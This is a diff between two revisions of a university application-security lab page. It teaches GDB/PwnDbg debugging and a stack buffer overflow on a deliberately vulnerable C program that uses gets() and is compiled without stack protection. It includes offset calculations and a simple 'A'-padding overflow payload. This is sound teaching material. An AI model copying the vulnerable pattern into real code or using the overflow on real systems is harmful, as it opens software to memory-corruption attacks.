Show page

Differences

This shows you the differences between two versions of the page.

--- isc:labs:06 [2023/04/10 15:37]
florin.stancu
+++ isc:labs:06 [2024/04/09 20:48] (current)
alexandru.mircea98 [Reading and modifying memory]
@@ Line 1: / Line 1: @@
 ===== Lab 06 - Application Security =====
 ===== Resources =====
@@ Line 8: / Line 8: @@
 ===== Setup =====
-  * Open a lab VM instance on [[https://cloud.grid.pub.ro|openstack]], image: //**ISC 2022.2**//, flavor: **//m1.small//**, availability zone: **//any//**;
+  * Open a lab VM instance on [[https://cloud.grid.pub.ro|OpenStack]], image: **ISC 2023 rev 2**, flavor: **m1.medium**.
-<hidden>
-Please record your screen using [[https://www.mankier.com/1/asciinema|asciinema]] while working:
-<code bash>
-# install the package
-$ sudo apt update -y && sudo apt install -y asciinema
-# start recording (optionally, use --append to append to an existing one)
-$ asciinema rec [--append] lab05_${LDAP_USERNAME}.cast
-# echo your name in the terminal
+  * Install the 32-bit **libc** and **gcc-multilib** packages:
-$ echo "Andrei Popescu"
-# work... then:
-# stop recording
-$ exit
-# upload recording
+<code>
-$ ASCIINEMA_API_URL=https://asciinema.cs.pub.ro asciinema upload lab05_${LDAP_USERNAME}.cast
-</code>
+sudo apt install libc6-dev-i386 gcc-multilib
-</hidden>
-  * Install the 32-bit `libc` and `gcc-multilib` packages:
-<code>
-$ sudo apt install libc6-dev-i386 gcc-multilib
 </code>
-<note tip>
+  * Install the PwnDbg plugin:
-If you still get a linker error after installing ''libgcc'', try compiling with ''clang''.
-</note>
-  * Install the gdb peda plugin:
 <code>
-$ git clone https://github.com/longld/peda.git ~/peda
+git clone https://github.com/pwndbg/pwndbg
-(...)
+cd pwndbg
-$ echo "source ~/peda/peda.py" >> ~/.gdbinit
+./setup.sh
-(...)
 </code>
@@ Line 48: / Line 29: @@
 <code>
-$ gdb
+➜ gdb
-GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git
+GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-....
+...
-gdb-peda$
+pwndbg>
 </code>
-Type ''q'' to exit gdb. We are using gdb peda instead of the classic gdb because it is much more user friendly. We hope you'll like it ;)
+Enter ''q'' to exit GDB. We are using PwnDbg instead of the classic GDB because it is much more user friendly. Hope you'll like it ;)
-  * Don't forget to submit the lab's [[ https://forms.office.com/r/GZzRJVqQuy |feedback form]]. Double check at [[ https://ctipub-my.sharepoint.com/:x:/g/personal/mihai_chiroiu_upb_ro/Ee4pZApRKA5Iq9JgR2r652QB0FVL4J9EFtTBtva3jX-1Lw?e=ylQ7lu | form responses]] ;)
 ===== Overview =====
@@ Line 63: / Line 42: @@
 <note tip>
-This representation of the stack is valid for 32 bit programs. The calling convention is to save the parameters on the stack. To find out what's different for a 64 bit program check this [[https://www.systutorials.com/x86-64-calling-convention-by-gcc/|website]]
+This representation of the stack is valid for 32 bit programs. The calling convention is to save the parameters on the stack.
+To find out what's different for a 64 bit program check this [[https://www.systutorials.com/x86-64-calling-convention-by-gcc/|website]].
 </note>
@@ Line 70: / Line 53: @@
 ===== GDB tutorial =====
-==== GDB peda ====
+==== PwnDbg ====
 ==== Loading a program ====
 In order to start debugging using GDB, you need to specify the program to be inspected. There are two options for doing this:
   * When launching GDB:
 <code>
-student@host$ gdb prog
+➜ gdb buggy
 </code>
   * After launching GDB:
 <code>
-student@host$ gdb
-(...)
+➜ gdb
-gdb-peda$ file prog
+...
-Reading symbols from prog...done.
+pwndbg> file buggy
+Reading symbols from buggy...
 </code>
 Once the debugging symbols from the executable were loaded, you can start executing your program using the ''run'' command.
 <code>
-gdb-peda$ run
+pwndbg> run
 </code>
-<note tip>You do not need the specify the full command, GDB can fill in the rest of a word in a command for you, if there is only one possibility. E.g.: ''r'', ''ru'' and ''run'' are equivalent; ''c'', ''co'', ''continue'' are equivalent.</note>
+<note tip>
+You do not need the specify the full command, GDB can fill in the rest of a word in a command for you, if there is only one possibility.
+E.g.: ''r'', ''ru'' and ''run'' are equivalent; ''c'', ''co'', ''continue'' are equivalent.
+</note>
 In order to specify arguments for the debugged program, you can either:
   * Specify them prior to starting the program:
 <code>
-gdb-peda$ set args arg1 arg2
+pwndbg> set args a b
 </code>
   * Specify them when starting the program:
 <code>
-gdb-peda$ run arg1 arg2
+pwndbg> run a b
 </code>
-<note tip>You do not need to specify the arguments each time: ''run'' with no arguments uses the same arguments used by the previous ''run'', or those set by the ''set args'' command.</note>
+<note tip>
+You do not need to specify the arguments each time:
+''run'' with no arguments uses the same arguments used by the previous ''run'', or those set by the ''set args'' command.
+</note>
 ==== Breakpoints ====
-Breakpoints represent places in your program where the execution should be stopped. They are added using the [[http://www.delorie.com/gnu/docs/gdb/gdb_29.html|break command and its variants]]. Here are the most common usages:
+Breakpoints represent places in your program where the execution should be stopped.
-  * ''break function'' - Set a breakpoint at entry to function function. When using source languages that permit overloading of symbols, such as C++, function may refer to more than one possible place to break. See section Breakpoint menus, for a discussion of that situation.
+They are added using the [[https://visualgdb.com/gdbreference/commands/break|break]] command. Here are the most common usages:
-  * ''break linenum'' - Set a breakpoint at line linenum in the current source file. The current source file is the last file whose source text was printed. The breakpoint will stop your program just before it executes any of the code on that line.
-  * ''break filename:linenum'' - Set a breakpoint at line linenum in source file filename.
+  * ''break function'' - Set a breakpoint at function entry. When using source languages that permit overloading of symbols, such as C++, function may refer to more than one possible place to break.
-  * ''break filename:function'' - Set a breakpoint at entry to function function found in file filename. Specifying a file name as well as a function name is superfluous except when multiple files contain similarly named functions.
-  * ''break *address'' - Set a breakpoint at address address. You can use this to set breakpoints in parts of your program which do not have debugging information or source files.
+  * ''break linenum'' - Set a breakpoint at line ''linenum'' in the current source file. The current source file is the last file whose source text was printed. The breakpoint will stop your program just before it executes any of the code on that line.
+  * ''break filename:linenum'' - Set a breakpoint at line ''linenum'' in source file ''filename''.
+  * ''break filename:func'' - Set a breakpoint at entry of the function ''func'' found in file ''filename''. Specifying a file name as well as a function name is superfluous except when multiple files contain similarly named functions.
+  * ''break *addr'' - Set a breakpoint at address ''addr''. You can use this to set breakpoints in parts of your program which do not have debugging information or source files.
 You can see an overview of the current breakpoints using the ''info break'' command.
 <code>
-gdb-peda$ info break
+pwndbg> info b
 Num     Type           Disp Enb Address    What
-       breakpoint     keep y   0x0804856d in main at buggy.c:33
+       breakpoint     keep y   0x000011de in wanted at buggy.c:6
-       breakpoint     keep y   0x080484d1 in print_message at buggy.c:12
+       breakpoint     keep y   0x00001229 in copy at buggy.c:16
-       breakpoint     keep y   0x080484d1 in print_message at buggy.c:12
+       breakpoint     keep y   0x00001281 in main at buggy.c:22
 </code>
 <note tip>
 Short for ''info break'' is ''i b''.
 </note>
-In order to [[http://www.delorie.com/gnu/docs/gdb/gdb_32.html|remove breakpoints]], you can use the ''clear'' or the ''delete'' (''d'') command. With the ''clear'' command you can delete breakpoints according to where they are in your program. With the ''delete'' command you can delete individual breakpoints by specifying their breakpoint numbers.
+In order to remove breakpoints, you can use the ''clear'' or the ''delete'' (''d'') command.
+With the [[https://visualgdb.com/gdbreference/commands/clear|clear]] command you can delete breakpoints according to where they are in your program.
+With the [[https://visualgdb.com/gdbreference/commands/delete|delete]] command you can delete individual breakpoints by specifying their breakpoint numbers.
 <code>
-gdb-peda$ delete 2
-gdb-peda$ clear buggy.c:33
+pwndbg> delete 2
-Deleted breakpoint 1
+pwndbg> clear buggy.c:6
+Deleted breakpoint 1
 </code>
-Once you want to resume execution, you can use the ''continue'' command.
+Once you want to resume execution, you can use the ''continue'' (''c'') command.
 <code>
-gdb-peda$ continue
+pwndbg> continue
 Continuing.
-[Inferior 1 (process 5809) exited normally]
+...
+[Inferior 1 (process 11131) exited normally]
 </code>
@@ Line 147: / Line 180: @@
 <code>
-[----------------------------------registers-----------------------------------]
-EAX: 0x56556fd4 --> 0x1edc
-EBX: 0x0
-ECX: 0xffffd5c0 --> 0x1
-EDX: 0xffffd5e4 --> 0x0
-ESI: 0xffffd5c0 --> 0x1
-EDI: 0x0
-EBP: 0xffffd5a8 --> 0x0
-ESP: 0xffffd580 --> 0xf7fbe3fc --> 0xf7fbf200 --> 0x0
-EIP: 0x565555d0 (<main+31>:	mov    DWORD PTR [ebp-0x1f],0x6c6c6548)
-EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
-[-------------------------------------code-------------------------------------]
-x565555c4 <main+19>:	call   0x56555616 <__x86.get_pc_thunk.ax>
-x565555c9 <main+24>:	add    eax,0x1a0b
-x565555ce <main+29>:	mov    esi,ecx
-=> 0x565555d0 <main+31>:	mov    DWORD PTR [ebp-0x1f],0x6c6c6548
-x565555d7 <main+38>:	mov    WORD PTR [ebp-0x1b],0x216f
-x565555dd <main+44>:	mov    BYTE PTR [ebp-0x19],0x0
-x565555e1 <main+48>:	sub    esp,0xc
-x565555e4 <main+51>:	lea    edx,[ebp-0x1f]
-[------------------------------------stack-------------------------------------]
-| 0xffffd580 --> 0xf7fbe3fc --> 0xf7fbf200 --> 0x0
-| 0xffffd584 --> 0x56556fd4 --> 0x1edc
-| 0xffffd588 --> 0xffffd65c --> 0xffffd798 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
-| 0xffffd58c ("kVUV\001")
-| 0xffffd590 --> 0x1
-| 0xffffd594 --> 0xffffd654 --> 0xffffd782 ("/home/student/buffovf")
-| 0xffffd598 --> 0xffffd65c --> 0xffffd798 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
-| 0xffffd59c --> 0xffffd5c0 --> 0x1
-[------------------------------------------------------------------------------]
-Legend: code, data, rodata, value
-Temporary breakpoint 1, main (argc=0x1, argv=0xffffd654) at buffovf.c:16
+              if (argc == 1) {
-		char buf[] = "Hello!";
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+─────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────
+*EAX  0xffffd880 ◂— 0x2
+*EBX  0x56558fcc (_GLOBAL_OFFSET_TABLE_) ◂— 0x3ed4
+*ECX  0xffffd880 ◂— 0x2
+*EDX  0xffffd8a0 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
+*EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
+*ESI  0xffffd934 —▸ 0xffffdabd ◂— '/home/student/appsec/buggy'
+*EBP  0xffffd868 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 —▸ 0x56555000 ◂— 0x464c457f
+*ESP  0xffffd850 —▸ 0xffffd890 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
+*EIP  0x56556281 (main+31) ◂— cmp dword ptr [eax], 1
+───────────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────────────
+ ► 0x56556281 <main+31>    cmp    dword ptr [eax], 1
+x56556284 <main+34>    jne    main+61                    <main+61>
+    ↓
+x5655629f <main+61>    mov    dword ptr [ebp - 0xc], 0x796568
+x565562a6 <main+68>    mov    eax, dword ptr [eax + 4]
+x565562a9 <main+71>    add    eax, 4
+x565562ac <main+74>    mov    eax, dword ptr [eax]
+x565562ae <main+76>    sub    esp, 4
+x565562b1 <main+79>    push   eax
+x565562b2 <main+80>    lea    eax, [ebp - 0xc]
+x565562b5 <main+83>    push   eax
+x565562b6 <main+84>    lea    eax, [ebx - 0x1f6e]
+────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────
+In file: /home/student/appsec/buggy.c
+         gets(name);
+         printf("bye\n");
+}
+
+int main(int argc, char **argv) {
+ ► 22         if (argc == 1) {
+                 puts("Usage: %s <name>\n");
+                 return 1;
+          }
+         char buf[] = "hey";
+
+────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
+:0000│ esp 0xffffd850 —▸ 0xffffd890 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
+:0004│-014 0xffffd854 —▸ 0xf7fbe66c —▸ 0xf7ffdba0 —▸ 0xf7fbe780 —▸ 0xf7ffda40 ◂— ...
+:0008│-010 0xffffd858 —▸ 0xf7fbeb20 —▸ 0xf7d99cc6 ◂— 'GLIBC_PRIVATE'
+:000c│-00c 0xffffd85c ◂— 0x1
+:0010│-008 0xffffd860 —▸ 0xffffd880 ◂— 0x2
+:0014│-004 0xffffd864 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
+:0018│ ebp 0xffffd868 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 —▸ 0x56555000 ◂— 0x464c457f
+:001c│+004 0xffffd86c —▸ 0xf7da0519 (__libc_start_call_main+121) ◂— add esp, 0x10
+──────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
+ ► 0 0x56556281 main+31
+0xf7da0519 __libc_start_call_main+121
+0xf7da05f3 __libc_start_main+147
+0x565560cb _start+43
+─────────────────────────────────────────────────────────────────────────────────────────────────────────
 </code>
-Let's take a look at the previous output that gdb peda prints. You can see it is seprated into 3 sections: registers, code and stack. With the original gdb you would have to manually print registers, disassemble code and inspect the stack. Thanks, God, for peda!!
+Let's take a look at the previous output that PwnDbg prints. You can see it is seprated into 5 sections: REGISTERS, DISASM, SOURCE, STACK and TRACE.
+With the original GDB you would have to manually print registers, disassemble code and inspect the stack. Thanks, God, for PwnDbg!
 ==== Step ====
-There might be situations when you only want to execute one line of source code, or one machine instruction from your program. This action is called [[https://sourceware.org/gdb/onlinedocs/gdb/Continuing-and-Stepping.html|a step]] and can be categorized as follows:
+There might be situations when you only want to execute one line of source code, or one machine instruction from your program.
-  * Step into - ''step'' or ''s'': Continue running your program until control reaches a different source line, then stop it and return control to GDB. If the line you are stepping over represents a function call, this command will step inside it.
+This action is called [[https://sourceware.org/gdb/onlinedocs/gdb/Continuing-and-Stepping.html|step]] and can be categorized as follows:
-  * Step over - ''next'' or ''n'': Continue to the next source line in the current stack frame. This is similar to step, but function calls that appear within the line of code are executed without stopping.
-There are also equivalent functions fo the machine instructions: stepi, nexti.
-If you stepped into a function and you want to continue the execution until the function returns, you can use the ''finish'' command.
+  * ''step'' or ''s'' (step into) - Continue running your program until control reaches a different source line, then stop it and return control to GDB. If the line you are stepping over represents a function call, this command will step inside it.
+  * ''next'' or ''n'' (step over) - Continue to the next source line in the current stack frame. This is similar to step, but function calls that appear within the line of code are executed without stopping.
+There are also equivalent functions for the machine instructions: ''stepi'' and ''nexti''.
+If you stepped into a function and you want to continue the execution until the function returns, you can use the ''finish'' or ''f'' (step out) command.
 ==== Printing variables and memory ====
 No need to manually print registers anymore, but you still might need to print the content of a variable:
 <code>
-gdb-peda$ print input
-$6 = 0
+pwndbg> print argc
+$1 = 2
 </code>
-The ''print'' command allows you to specify the format of the output like this (you can find a full list of possible format specifiers [[https://ftp.gnu.org/old-gnu/Manuals/gdb/html_chapter/gdb_9.html#SEC55|here]]):
+The ''print'' or ''p'' command allows you to specify the format of the output like this (you can find a full list of possible format specifiers [[https://ftp.gnu.org/old-gnu/Manuals/gdb/html_chapter/gdb_9.html#SEC55|here]]):
 <code>
-gdb-peda$ p/x $esp
-$3 = 0xffffcf00
-gdb-peda$ x/2x 0xffffcf00
-xffffcf00:	0xffffcf4c	0xf7fcf0f0
-gdb-peda$ p/d $esp
-$4 = 4294954752
-gdb-peda$ p/s buf
+pwndbg> p/x $esp
-$9 = "OK. Bye!\n"
+$1 = 0xffffd860
-gdb-peds$ p/x buf
-$10 = {0x4f, 0x4b, 0x2e, 0x20, 0x42, 0x79, 0x65, 0x21, 0xa, 0x0}
+pwndbg> x/2x 0xffffd860
+xffffd860:     0xffffd8a0      0xf7fbe66c
+pwndbg> p/d $esp
+$2 = -10144
+pwndbg> p/s buf
+$3 = "hey"
+pwndbg> p/x buf
+$4 = {0x68, 0x65, 0x79, 0x0}
 </code>
 ==== Reading and modifying memory ====
-You can use the command ''x'' (for "examine") to examine memory in any of several formats, independently of your program's data types.
+You can use the command ''x'' (for **examine**) to examine memory in several formats, independently of your program's data types.
 <code>
-x/nfu addr
+pwndbg> x/nfu addr
 </code>
-''n'', ''f'', and ''u'' are all optional parameters that specify how much memory to display and how to format it; ''addr'' is an expression giving the address where you want to start displaying memory.
-  * **n** - the repeat count: The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units u) to display.
+''n'', ''f'', and ''u'' are all optional parameters that specify how much memory to display and how to format it.
-  * **f** - the display format: The display format is one of the formats used by print
-  * **u** - the unit size: The unit size is any of ''b'' (bytes), ''h'' (halfwords), ''w'' (words)
+''addr'' is an expression giving the address where you want to start displaying memory.
+  * **n** - The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units **u**) to display.
+  * **f** - The display format is one of the formats used by print.
+  * **u** - The unit size is any of ''b'' (bytes), ''h'' (halfwords), ''w'' (words)
 E.g.: Print 10 words in hexadecimal format, starting from the address of the current stack pointer.
 <code>
-gdb-peda$ x/10xw $esp
-xffffcf00:	0xffffcf58	0x4b4fdf10	0x7942202e	0x000a2165
+pwndbg> x/10wx $esp
-xffffcf10:	0xffffcf32	0xf7ffd918	0xffffcf58	0x080485b8
+xffffd850:     0xffffd890      0xf7fbe66c      0xf7fbeb20      0x00796568
-xffffcf20:	0x00000000	0x080486b8
+xffffd860:     0xffffd880      0xf7fa9000      0xf7ffd020      0xf7da0519
+xffffd870:     0xffffdabd      0x00000070
 </code>
 In order to change the value of a variable or of a specific memory area, you can use the ''set'' command:
 <code>
-gdb-peda$ set g=4
-gdb-peda$ set {int}0x83040 = 4
+pwndbg> set g = 4
+pwndbg> set {int}0xffffd890 = 4
 </code>
@@ Line 246: / Line 327: @@
 A backtrace is a summary of how your program got where it is. It shows one line per frame, for many frames, starting with the currently executing frame (frame zero), followed by its caller (frame one), and on up the stack.
-''backtrace'': Print a backtrace of the entire stack: one line per frame for all frames in the stack.
+''backtrace'' or ''bt'' - Print a backtrace of the entire stack: one line per frame for all frames in the stack.
 E.g.:
 <code>
-gdb-peda$ bt
-#0  print_message (input=0) at buggy.c:16
+pwndbg> backtrace
-#1  0x080485b8 in main () at buggy.c:38
+#0  copy () at buggy.c:16
+#1  0x565562ca in main (argc=2, argv=0xffffd934) at buggy.c:29
+#2  0xf7da0519 in ?? ()
+Backtrace stopped: previous frame inner to this frame (corrupt stack?)
 </code>
 It is also possible to move up or down the stack using the following commands:
-  * ''up n'': Move n frames up the stack. For positive numbers n, this advances toward the outermost frame, to higher frame numbers, to frames that have existed longer. n defaults to one.
-  * ''down n'': Move n frames down the stack. For positive numbers n, this advances toward the innermost frame, to lower frame numbers, to frames that were created more recently. n defaults to one.
+  * ''up n'' - Move **n** frames up the stack. For positive numbers **n**, this advances toward the outermost frame, to higher frame numbers, to frames that have existed longer. **n** defaults to one.
+  * ''down n'' - Move **n** frames down the stack. For positive numbers **n**, this advances toward the innermost frame, to lower frame numbers, to frames that were created more recently. **n** defaults to one.
 Another useful command for printing information related to the current stack frame is ''info frame''. This command prints a verbose description of the selected stack frame, including:
   * the address of the frame
   * the address of the next frame down (called by this frame)
   * the address of the next frame up (caller of this frame)
   * the language in which the source code corresponding to this frame is written
   * the address of the frame's arguments
   * the address of the frame's local variables
   * the program counter saved in it (the address of execution in the caller frame)
   * which registers were saved in the frame
 ==== Exercises ====
-=== 00. Our test program ===
+For exercises 02-04 do not quit GDB.
+=== 01. [5p] Our test program ===
 Compile the following code:
+''buggy.c''
 <code>
 #include <stdio.h>
 #include <unistd.h>
@@ Line 289: / Line 391: @@
 void copy() {
 	char name[12];
 	printf("what's ur last name?\n");
 	gets(name);
 	printf("bye\n");
 }
 int main(int argc, char **argv) {
-        if (argc == 1) {
+  if (argc == 1) {
-                puts("Usage: %s <name>\n");
+    puts("Usage: %s <name>\n");
-                return 1;
+    return 1;
-         }
+  }
 	char buf[] = "hey";
 	printf("%s, %s\n", buf, argv[1]);
 	copy();
-  	exit(0);
+  exit(0);
 }
 </code>
-like this:
+Use this command:
 <code>
-gcc buffovf.c -o buffovf -fno-stack-protector -m32 -g
+gcc buggy.c -o buggy -fno-stack-protector -m32 -g
 </code>
-You may need to install ''libc6-dev-i386'' for 64-bit systems.
+=== 02. [5p] Run, break, step ===
-=== 01. Run, break, step ===
+Run the program using GDB, setting the argument ''Florin''.
-Run the program using GDB, setting the argument "AAA". Set a breakpoint at the beginning of the ''main'' function. Continue execution until you hit the breakpoint. Try to reach the beginning of the ''copy'' function without setting another breakpoint.
+Set a breakpoint at the beginning of the ''main'' function.
-<note tip>Hint: use step over and step into.</note>
+Continue execution until you hit the breakpoint.
-After solving this exercise, don't close gdb.
+Try to reach the beginning of the ''copy'' function without setting another breakpoint.
+**Hint:** Use step over and step into.
 <solution -hidden>
 <code>
-gdb-peda$ set args AAA
-gdb-peda$ b main
+➜ gdb buggy
-Breakpoint 1 at 0x8048483: file buffovf.c, line 16.
+...
-gdb-peda$ r
+pwndbg> set args Florin
-Starting program: /home/veronica/work/isc/lab6/buffovf AAA
+pwndbg> b main
-(...)
+pwndbg> r
-Breakpoint 1, main (argc=2, argv=0xffffcff4) at buffovf.c:16
+Starting program: /home/student/appsec/buggy AAA
-		char buf[] = "hey";
+...
-(...)
+Breakpoint 1, main (argc=2, argv=0xffffd934) at buggy.c:22
-gdb-peda$ n
+              if (argc == 1) {
-		printf("%s, %s\n", buf, argv[1]);
+...
-(...)
+pwndbg> n
-gdb-peda$ n
+              char buf[] = "hey";
-hey, AAA
+...
-		copy(argv[1]);
+pwndbg> n
-(...)
+              printf("%s, %s\n", buf, argv[1]);
+...
+pwndbg> n
+hey, Florin
+              copy();
+...
+pwndbg> s
+copy () at buggy.c:16
+              printf("what's ur last name?\n");
 </code>
 </solution>
-=== 02. Printing stuff ===
+=== 03. [5p] Printing stuff ===
-Remove the existing breakpoint and set a new one at the beginning of the ''copy'' function. Run again the program and continue execution until you hit the breakpoint. Print the value and the address of ''name''. Print the value of it after ''gets(name)'' is executed.
+Remove the existing breakpoint and set a new one at the beginning of the ''copy'' function.
+Run again the program and continue execution until you hit the breakpoint.
+Print the value and the address of ''name''. Print the value again after ''gets(name)'' is executed.
 <solution -hidden>
 <code>
-gdb-peda$ del 1
-gdb-peda$ b copy
+pwndbg> del 1
-gdb-peda$ r
+pwndbg> b copy
-(...)
+Breakpoint 2 at 0x1229: file buggy.c, line 16.
-Breakpoint 2 at 0x804845a: file buffovf.c, line 16.
+pwndbg> run
-gdb-peda p name
+Starting program: /home/student/appsec/buggy AAA
-$1 = "@\331\377\367e\233\343\367x\205\004\b"
+...
-(gdb) p &name
+hey, Florin
-$2 = (char (*)[12]) 0xffffd564
-gdb-peda$ n (x9)
+Breakpoint 2, copy () at buggy.c:16
-(...)
+              printf("what's ur last name?\n");
-Legend: code, data, rodata, value
+...
-x08048507	17		gets(name);
+pwndbg> p name
-gdb-peda$
+$1 = "\000\000\000\000\231j\335\367\302bUV"
-BBB
+pwndbg> p &name
-(...)
+$2 = (char (*)[12]) 0xffffd834
-gdb-peda$ p name
+pwndbg> n
-$4 = "bbb\000e\233\343\367x\205\004\b"
+what's ur last name?
+              gets(name);
+...
+pwndbg> n
+parizer
+              printf("bye\n");
+...
+pwndbg> p name
+$3 = "parizer\000\302bUV"
 </code>
 </solution>
-=== 03. ASLR ===
+=== 04. [5p] ASLR ===
-Start the execution again (do not exit GDB) and print the address of ''buf'' from the main function. What do you notice? Check in another tab if ASLR is enabled on your PC. What happens and how can you fix it?
+Start the execution and print the address of ''buf'' from the main function, and then repeat. What do you notice?
-<note tip>Hint: [[http://visualgdb.com/gdbreference/commands/set_disable-randomization]]</note>
+Check from GDB if ASLR is enabled. What happens and how can you fix it?
+**Hint:** [[http://visualgdb.com/gdbreference/commands/set_disable-randomization]]
 <solution -hidden>
 <code>
-gdb-peda$ s
-gdb-peda$ show disable-randomization
+pwndbg> start
+              if (argc == 1) {
+...
+pwndbg> p &buf
+$4 = (char (*)[4]) 0xffffd86c
+pwndbg> start
+              if (argc == 1) {
+...
+pwndbg> p &buf
+$5 = (char (*)[4]) 0xffffd86c
+pwndbg> show disable-randomization
 Disabling randomization of debuggee's virtual address space is on.
-gdb-peda$ p &buf
+pwndbg> set disable-randomization off
-$5 = (char (*)[4]) 0xfff1d54c
+pwndbg> start
-gdb-peda$ r
+              if (argc == 1) {
-(...)
+...
-gdb-peda$ p &buf
+pwndbg> p &buf
-$6 = (char (*)[4]) 0xfff1d54c
+$6 = (char (*)[4]) 0xffdfba0c
-gdb-peda$ set disable-randomization off
+pwndbg> start
-gdb-peda$ p &buf
+              if (argc == 1) {
-$5 = (char (*)[4]) 0xfff1d54c
+...
-gdb-peda$ r
+pwndbg> p &buf
-(...)
+$7 = (char (*)[4]) 0xffe73a5c
-gdb-peda$ p &buf
-$6 = (char (*)[4]) 0xfff8fecc
 </code>
 </solution>
-=== 04. Address investigation ===
+=== 05. [15p] Address investigation ===
-Restart gdb and run until the beginning of the ''copy'' function using ''next'' and ''step'' accordingly. Display stack info (''bt'', ''info frame''). At what address is ''name'' located? At what address is the saved return address located? How many bytes of input do you need in order to overwrite the return address?
+Restart gdb and run until the beginning of the ''copy'' function.
+  * At what address is ''name'' located?
+  * At what address is the saved return address located?
+  * How many bytes of input do you need in order to overwrite the return address?
+**Hint:** Display stack info using ''info frame''.
 <solution -hidden>
 <code>
-(gdb) info frame
-Stack level 0, frame at 0xffffcf20:
+➜ gdb buggy
- eip = 0x804845a in copy (buffovf.c:12); saved eip = 0x80484b4
+...
- called by frame at 0xffffcf60
+pwndbg> b copy
+Breakpoint 1 at 0x1229: file buggy.c, line 16.
+pwndbg> r "Florin"
+Starting program: /home/student/appsec/buggy "Florin"
+...
+hey, Florin
+Breakpoint 1, copy () at buggy.c:16
+              printf("what's ur last name?\n");
+...
+pwndbg> p &name
+$1 = (char (*)[12]) 0xffffd834
+pwndbg> info frame
+Stack level 0, frame at 0xffffd850:
+ eip = 0x80491e0 in copy (buggy.c:16); saved eip = 0x804926a
+ called by frame at 0xffffd880
  source language c.
- Arglist at 0xffffcf18, args: arg=0xffffd20b "aaa"
+ Arglist at 0xffffd848, args:
- Locals at 0xffffcf18, Previous frame's sp is 0xffffcf20
+ Locals at 0xffffd848, Previous frame's sp is 0xffffd850
  Saved registers:
-  ebp at 0xffffcf18, eip at 0xffffcf1c
+  ebp at 0xffffd848, eip at 0xffffd84c
-(gdb) bt
+pwndbg> p 0xffffd84c - 0xffffd834
-#0  copy (arg=0xffffd20b "aaa") at buffovf.c:12
+$2 = 24
-#1  0x080484b4 in main (argc=2, argv=0xffffcff4) at buffovf.c:20
-(gdb) p 0xffffd56c-0xffffd554
-$6 = 24
 </code>
 </solution>
-=== 05. Buffer overflow ===
+=== 06. [5p] Buffer overflow ===
-We want to overflow the buffer ''name'' from the copy() function. Run the program and provide an input so that the program crashes.
+We want to overflow the buffer ''name'' from the ''copy()'' function. Run the program and provide an input so that the program crashes.
 <note tip>
-You can use ''%%gdb$ run <program args> < <(python3 -c 'print("A" * 30)')%%'' for stdin redirection directly within GDB! ;)
-WARNING: DokuWiki replaces ''"'' with quote-like UTF-8 character unrecognized by bash!
+You can use ''%%run args < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * N)')%%'' for stdin redirection directly within GDB! ;)
 </note>
 <note warning>
-Some python3 installations (especially on Ubuntu) use a default UTF-8 encoding and auto-corrects any unknown binary string to a valid sequence.
-To fix this, use binary strings:
+Do not use ''print'' in Python for this purpose as some installations (especially on Ubuntu) use a default UTF-8 encoding and auto-correct any unknown binary string to a valid sequence.
-'' import sys; sys.stdout.buffer.write(b"AAAAA\x90\x80\x70\x60")''
+You can test the binary output using **xxd**: ''python3 -c '... write here ...' | xxd -g 1''
-You can test the binary output using **xxd**: '' python3 -c '... write here ...' | xxd -g 1 ''
 </note>
-<solution -hidden>
+=== 07. [20p] Call the ''wanted'' function ===
-<code>
-student@host$ python -c "print 28 * 'A'" | ./buffovf AAA
-hey, AAA
-what's ur last name?
-bye
-Segmentation fault (core dumped)
-</code>
-</solution>
-=== 06. Call the ''wanted'' function ===
-We want to create an attack which invokes the ''wanted'' function. What is the address of this function? Adjust the input so that the return address is overwritten with the address of the ''wanted'' function.
+We want to create an attack which invokes the ''wanted'' function. What is the address of this function?
+Adjust the input so that the return address is overwritten with the address of the ''wanted'' function.
 <note tip>
-Use //objdump -d -M intel buffovf// to list all the addresses from the binary. Look for the address of the ''wanted'' function.
+Use ''objdump -d -M intel buggy'' to list all the addresses from the binary. Look for the address of the ''wanted'' function.
 </note>
 You can see that when using ''objdump'' the addresses look weird (short):
 <code>
-fd <wanted>:
-fd:	55                   	push   ebp
+cd <wanted>:
-fe:	89 e5                	mov    ebp,esp
+cd:       55                      push   ebp
-:	53                   	push   ebx
+ce:       89 e5                   mov    ebp,esp
+d0:       53                      push   ebx
+d1:       83 ec 04                sub    esp,0x4
 </code>
-They aren't actually real addresses, they are offsets counting the number of bytes from the beginning of the file. This happens because the program was compiled as PIC (position independent code). More details can be found [[https://codywu2010.wordpress.com/2014/11/29/about-elf-pie-pic-and-else/|here]]. Recompile the program without PIC and PIE using ''-fno-pic -no-pie'' options for gcc.
+They aren't actually real addresses, they are offsets counting the number of bytes from the beginning of the file.
+This happens because the program was compiled as PIC (position independent code).
